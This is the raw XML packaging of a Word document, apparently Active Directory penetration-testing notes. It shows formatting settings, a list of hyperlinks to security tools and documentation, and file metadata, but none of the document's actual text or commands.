      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1753045069">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1766610344">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86346294">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1809472784">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1836337196">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1848472996">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1852989545">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1853911767">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1860580626">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1860773030">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1864784999">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1867022312">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1870532434">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1878733779">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1883899751">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1894927097">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1897013881">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1940487335">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1942837874">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1944459291">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1955817974">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1956449004">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1960260309">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1961451295">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1987977519">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1992320662">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1993294138">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1994989286">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2020428252">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2037922144">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2050643653">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2058237431">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2066492274">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2076200430">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2082020904">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2087191197">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2087801665">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2097629642">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2102993521">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2104639306">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2108648909">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2112508002">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2113890438">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2134277697">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2144347176">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="214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docs.microsoft.com/en-us/sysinternals/downloads/psexec" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors" TargetMode="Externa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github.com/sshuttle/sshuttle" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/PowerShellMafia/PowerSplo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en-us/powershell/module/activedirectory/?view=windowsserver2022-ps"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adepts.of0x.cc/shadowmove-hijack-socket/" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SecureAuthCorp/impacke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haveibeenpwned.com/" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bloodhound.readthedocs.io/en/latest/data-collection/sharphound-all-flags.html" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/tscon?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/gentilkiwi/kekeo" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/klsecservices/rpiv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vanhauser-thc/thc-hydra" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bloodhound.readthedocs.io/en/latest/data-analysis/edges.html"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yperlink" Target="https://github.com/SecureAuthCorp/impacket/blob/master/examples/ntlmrelayx.py" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stackoverflow.com/" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/powershell/module/activedirectory/?view=windowsserver2022-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ehashed.com/" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/GhostPack/Seatbelt" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://0xinfection.github.io/posts/wmi-ad-enum/" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pxeboot.za.tryhackme.com" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/gentilkiwi/mimikatz/security" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jpillora/chise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7EB6-CC14-4E98-B934-30A67524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2</TotalTime>
  <Pages>63</Pages>
  <Words>12064</Words>
  <Characters>6876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hamed.AbdelAti</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Ali Sobeih</cp:lastModifiedBy>
  <cp:revision>67</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-10-27T20:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-12T11:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>